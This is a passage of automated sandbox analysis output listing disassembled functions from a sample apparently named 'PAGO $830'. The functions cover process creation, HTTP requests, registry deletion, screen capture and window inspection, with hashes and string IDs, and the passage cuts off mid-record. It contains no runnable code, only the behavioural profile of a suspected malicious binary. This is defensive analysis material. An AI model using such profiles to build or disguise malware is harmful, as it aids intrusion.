                                                          • API String ID: 176396367-1603158881
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2055661098-1000479233
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • DragQueryPoint.SHELL32(?,?), ref: 00E09039
                                                            • Part of subcall function 00E07543: ClientToScreen.USER32(?,?), ref: 00E07569
                                                            • Part of subcall function 00E07543: GetWindowRect.USER32(?,?), ref: 00E075DF
                                                            • Part of subcall function 00E07543: PtInRect.USER32(?,?,00E08A7B), ref: 00E075EF
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E090A2
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E090AD
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E090D0
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E09117
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E09130
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E09147
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00E09169
                                                          • DragFinish.SHELL32(?), ref: 00E09170
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E09263
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#
                                                          • API String ID: 221274066-136824727
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00DFB0BF
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB0D7
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB0FB
                                                          • _wcslen.LIBCMT ref: 00DFB127
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB13B
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB15D
                                                          • _wcslen.LIBCMT ref: 00DFB259
                                                            • Part of subcall function 00DE04C5: GetStdHandle.KERNEL32(000000F6), ref: 00DE04E4
                                                          • _wcslen.LIBCMT ref: 00DFB272
                                                          • _wcslen.LIBCMT ref: 00DFB28D
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DFB2DD
                                                          • GetLastError.KERNEL32(00000000), ref: 00DFB32E
                                                          • CloseHandle.KERNEL32(?), ref: 00DFB360
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DFB371
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DFB383
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DFB395
                                                          • CloseHandle.KERNEL32(?), ref: 00DFB40A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 2178637699-0
                                                          • Opcode ID: b60c606bcd4774878d927dd54b3905ddc654d72bd95e7066c4f2473e3cf64155
                                                          • Instruction ID: 5ca216ccd0af2f3423c24ccca6f6b52778f22731b4ee089ab8c58ef9c7944b3b
                                                          • Opcode Fuzzy Hash: b60c606bcd4774878d927dd54b3905ddc654d72bd95e7066c4f2473e3cf64155
                                                          • Instruction Fuzzy Hash: 22F18E716043449FC714EF24C891B2ABBE1EF85324F19855EF9895B2A2DB31EC45CB72
                                                          APIs
                                                          • GetMenuItemCount.USER32(00E41990), ref: 00DB3B6F
                                                          • GetMenuItemCount.USER32(00E41990), ref: 00DB3C1F
                                                          • GetCursorPos.USER32(?), ref: 00DB3C63
                                                          • SetForegroundWindow.USER32(00000000), ref: 00DB3C6C
                                                          • TrackPopupMenuEx.USER32(00E41990,00000000,?,00000000,00000000,00000000), ref: 00DB3C7F
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00DB3C8B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                          • String ID: 0
                                                          • API String ID: 36266755-4108050209
                                                          • Opcode ID: e689185a6cdf7b5356a11f250551437c63a58a295213b2d2ed8da2a3a834c7f0
                                                          • Instruction ID: 781d819c5b5403ba389436e63e77f1e455eb889fb55910c8e8d07530d72b7688
                                                          • Opcode Fuzzy Hash: e689185a6cdf7b5356a11f250551437c63a58a295213b2d2ed8da2a3a834c7f0
                                                          • Instruction Fuzzy Hash: F3713331241215FEEB268F25DC49FEABF64FF04364F244206F529661E0C7B1A950EBA4
                                                          APIs
                                                          • DestroyWindow.USER32(?,?), ref: 00E06CB9
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E06D2D
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E06D4F
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E06D62
                                                          • DestroyWindow.USER32(?), ref: 00E06D83
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D70000,00000000), ref: 00E06DB2
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E06DCB
                                                          • GetDesktopWindow.USER32 ref: 00E06DE4
                                                          • GetWindowRect.USER32(00000000), ref: 00E06DEB
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E06E03
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E06E1B
                                                            • Part of subcall function 00D8ADC4: GetWindowLongW.USER32(?,000000EB), ref: 00D8ADD2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 2429346358-3619404913
                                                          • Opcode ID: ade46d2491f26990f631933ab498749d0ece3b105b9cd04286671e0e38409037
                                                          • Instruction ID: 54f6c216575d32e175c230a89a319ad9bed4c4d2e9a4a31b906676248b3b419f
                                                          • Opcode Fuzzy Hash: ade46d2491f26990f631933ab498749d0ece3b105b9cd04286671e0e38409037
                                                          • Instruction Fuzzy Hash: AF71AB74100341AFD720CF18CC44BAABBF9FB89308F14151EFA85A72A0C771EA96CB12
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DEC3CE
                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DEC3E1
                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DEC3F5
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DEC40E
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DEC451
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DEC467
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DEC472
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DEC4A2
                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DEC4FA
                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DEC50E
                                                          • InternetCloseHandle.WININET(00000000), ref: 00DEC519
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                          • String ID:
                                                          • API String ID: 3800310941-3916222277
                                                          • Opcode ID: 3e2a82464dedf2606fc03743b83adf85fb148535e8dffebda2460d0290ce1ce8
                                                          • Instruction ID: 9423f0b3d3360411177083b320ba26e876e707157da5c215e4263d1665877cce
                                                          • Opcode Fuzzy Hash: 3e2a82464dedf2606fc03743b83adf85fb148535e8dffebda2460d0290ce1ce8
                                                          • Instruction Fuzzy Hash: DC51BBB1110648BFDB21AF62C888ABB7BFCFF08744F14911AF945A6250D735E9499B70
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E05B6C,?,?), ref: 00E08484
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E05B6C,?,?,00000000,?), ref: 00E08494
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E05B6C,?,?,00000000,?), ref: 00E0849F
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00E05B6C,?,?,00000000,?), ref: 00E084AC
                                                          • GlobalLock.KERNEL32(00000000), ref: 00E084BA
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E05B6C,?,?,00000000,?), ref: 00E084C9
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00E084D2
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00E05B6C,?,?,00000000,?), ref: 00E084D9
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E05B6C,?,?,00000000,?), ref: 00E084EA
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E0FC54,?), ref: 00E08503
                                                          • GlobalFree.KERNEL32(00000000), ref: 00E08513
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00E08533
                                                          • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00E08563
                                                          • DeleteObject.GDI32(00000000), ref: 00E0858B
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E085A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3840717409-0
                                                          • Opcode ID: 1640d763144df822cd35645377cba5206fbb8e3cbcd82346b6b5e9510b65a854
                                                          • Instruction ID: 52eefdff00dd8a3026abd8c2d05cf0381adbf1083ba0fac20a5f3d1b023503b2
                                                          • Opcode Fuzzy Hash: 1640d763144df822cd35645377cba5206fbb8e3cbcd82346b6b5e9510b65a854
                                                          • Instruction Fuzzy Hash: 08417C71600204AFDB10CFA5DC88EAE7BB8FF89715F208158F955E72A0DB719D85CB20
                                                          APIs
                                                          • VariantInit.OLEAUT32(00000000), ref: 00DE1420
                                                          • VariantCopy.OLEAUT32(?,?), ref: 00DE1429
                                                          • VariantClear.OLEAUT32(?), ref: 00DE1435
                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DE1519
                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00DE1575
                                                          • VariantInit.OLEAUT32(?), ref: 00DE1626
                                                          • SysFreeString.OLEAUT32(?), ref: 00DE16AA
                                                          • VariantClear.OLEAUT32(?), ref: 00DE16F6
                                                          • VariantClear.OLEAUT32(?), ref: 00DE1705
                                                          • VariantInit.OLEAUT32(00000000), ref: 00DE1741
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                          • API String ID: 1234038744-3931177956
                                                          • Opcode ID: 11a6329fd96bbabb737707748c94460af54b7432389e109a42c0a2ae8e9a7bf5
                                                          • Instruction ID: c4e8e083c6a132271374ab8557f2e460a86312da06a39e14e12c2100f724c724
                                                          • Opcode Fuzzy Hash: 11a6329fd96bbabb737707748c94460af54b7432389e109a42c0a2ae8e9a7bf5
                                                          • Instruction Fuzzy Hash: 7FD1FC75B00255EBCB10BF66D884BB9B7B4FF09700F24815AE599AB281DB70EC44DBB1
                                                          APIs
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                            • Part of subcall function 00DFC8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB5D5,?,?), ref: 00DFC8DC
                                                            • Part of subcall function 00DFC8BF: _wcslen.LIBCMT ref: 00DFC918
                                                            • Part of subcall function 00DFC8BF: _wcslen.LIBCMT ref: 00DFC98F
                                                            • Part of subcall function 00DFC8BF: _wcslen.LIBCMT ref: 00DFC9C5
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFB61B
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFB699
                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00DFB731
                                                          • RegCloseKey.ADVAPI32(?), ref: 00DFB7A5
                                                          • RegCloseKey.ADVAPI32(?), ref: 00DFB7C3
                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DFB819
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DFB82B
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DFB849
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00DFB8AA
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00DFB8BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 146587525-4033151799
                                                          • Opcode ID: f25ebc7ffe8aac52c4e886cdb16c86873c978bceff50fd782e3b42caedb540c7
                                                          • Instruction ID: 7e56402090d25e9345740e5753331f8fb9658f88320b4c884ed0876c4cdef495
                                                          • Opcode Fuzzy Hash: f25ebc7ffe8aac52c4e886cdb16c86873c978bceff50fd782e3b42caedb540c7
                                                          • Instruction Fuzzy Hash: 1CC19C30208245AFD710DF25C484F2ABBE5FF84328F19C59DE5998B2A2DB71ED45CBA1
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00DF24FF
                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00DF250F
                                                          • CreateCompatibleDC.GDI32(?), ref: 00DF251B
                                                          • SelectObject.GDI32(00000000,?), ref: 00DF2528
                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00DF2594
                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00DF25D3
                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00DF25F7
                                                          • SelectObject.GDI32(?,?), ref: 00DF25FF
                                                          • DeleteObject.GDI32(?), ref: 00DF2608
                                                          • DeleteDC.GDI32(?), ref: 00DF260F
                                                          • ReleaseDC.USER32(00000000,?), ref: 00DF261A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: bbe3c9debb52da3b66d629821f1cec48db1fd6e87bd5d97d3a98df01c6329f72
                                                          • Instruction ID: 42658c575e4f3a9bd90b8d404af24c223b90f541bf89f4cf6b61cfb29a557832
                                                          • Opcode Fuzzy Hash: bbe3c9debb52da3b66d629821f1cec48db1fd6e87bd5d97d3a98df01c6329f72
                                                          • Instruction Fuzzy Hash: 5261D275D00219EFCF04CFA8D884AAEBBB5FF48710F208529EA55B7250D775A951CF60
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 00DADA41
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD5F9
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD60B
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD61D
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD62F
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD641
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD653
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD665
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD677
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD689
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD69B
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD6AD
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD6BF
                                                            • Part of subcall function 00DAD5DC: _free.LIBCMT ref: 00DAD6D1
                                                          • _free.LIBCMT ref: 00DADA36
                                                            • Part of subcall function 00DA2958: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000), ref: 00DA296E
                                                            • Part of subcall function 00DA2958: GetLastError.KERNEL32(00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000,00000000), ref: 00DA2980
                                                          • _free.LIBCMT ref: 00DADA58
                                                          • _free.LIBCMT ref: 00DADA6D
                                                          • _free.LIBCMT ref: 00DADA78
                                                          • _free.LIBCMT ref: 00DADA9A
                                                          • _free.LIBCMT ref: 00DADAAD
                                                          • _free.LIBCMT ref: 00DADABB
                                                          • _free.LIBCMT ref: 00DADAC6
                                                          • _free.LIBCMT ref: 00DADAFE
                                                          • _free.LIBCMT ref: 00DADB05
                                                          • _free.LIBCMT ref: 00DADB22
                                                          • _free.LIBCMT ref: 00DADB3A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: b687baa00bca3534f21921545c086e03b4d160e6ea691779af2b54142269b851
                                                          • Instruction ID: 612d186567331ec6a0586bbdb5701fc66429facc281aed20cd0cfc8a7d17b993
                                                          • Opcode Fuzzy Hash: b687baa00bca3534f21921545c086e03b4d160e6ea691779af2b54142269b851
                                                          • Instruction Fuzzy Hash: 7E317A726443069FEB20AA39D849B6B73EAFF22710F184429E45AD7561DF30ED85CB31
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00DD35DF
                                                          • _wcslen.LIBCMT ref: 00DD35EA
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00DD36DA
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00DD374F
                                                          • GetDlgCtrlID.USER32(?), ref: 00DD37A5
                                                          • GetWindowRect.USER32(?,?), ref: 00DD37CA
                                                          • GetParent.USER32(?), ref: 00DD37E8
                                                          • ScreenToClient.USER32(00000000), ref: 00DD37EF
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00DD3869
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00DD38A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                          • String ID: %s%u
                                                          • API String ID: 4010501982-679674701
                                                          • Opcode ID: ad8e1063e7f368f2bc143554bdfb3813089bbf3d06c1ee2914ba9bdbbaf42c52
                                                          • Instruction ID: 553a70e831d6607e5fc35eb6b8b4c666ab82e40610130bd79e609bd1a3970aac
                                                          • Opcode Fuzzy Hash: ad8e1063e7f368f2bc143554bdfb3813089bbf3d06c1ee2914ba9bdbbaf42c52
                                                          • Instruction Fuzzy Hash: ECA1C671204706AFD719DF64C844FAAF7A8FF44350F04862AF999D2250DB31EA49CBB2
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00DD48DC
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00DD4922
                                                          • _wcslen.LIBCMT ref: 00DD4933
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00DD493F
                                                          • _wcsstr.LIBVCRUNTIME ref: 00DD4974
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00DD49AC
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00DD49E9
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00DD4A37
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00DD4A71
                                                          • GetWindowRect.USER32(?,?), ref: 00DD4AE1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                          • String ID: ThumbnailClass
                                                          • API String ID: 1311036022-1241985126
                                                          • Opcode ID: f5d2bb9c0e91e24f40595d131139371e5226cad7c4fa7563d71d962bee24d0f5
                                                          • Instruction ID: bebc85084b241bb6ebc420e4bb867dc4035bdf7a81cc2ca968ebfe6f05996d51
                                                          • Opcode Fuzzy Hash: f5d2bb9c0e91e24f40595d131139371e5226cad7c4fa7563d71d962bee24d0f5
                                                          • Instruction Fuzzy Hash: E491DC711043059FDB04CF15C884BAA7BA8FF84314F08952BFD899A296EB31ED49CBB1
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E08C4C
